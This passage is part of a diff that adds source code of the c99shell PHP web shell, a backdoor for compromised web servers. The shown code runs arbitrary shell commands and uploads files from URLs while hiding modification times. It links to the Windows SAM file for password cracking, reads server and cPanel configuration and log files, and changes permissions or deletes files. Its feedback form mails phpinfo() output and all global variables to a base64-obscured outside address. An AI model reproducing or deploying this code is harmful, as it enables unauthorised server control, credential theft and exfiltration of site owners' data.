+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
